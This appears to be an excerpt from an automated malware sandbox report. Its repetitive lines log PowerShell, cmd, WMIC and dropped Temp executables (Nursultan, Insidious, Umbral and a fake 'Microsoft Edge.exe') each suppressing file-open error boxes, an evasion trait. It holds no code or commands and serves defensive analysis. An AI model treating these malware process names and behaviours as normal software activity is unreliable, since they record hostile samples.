                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
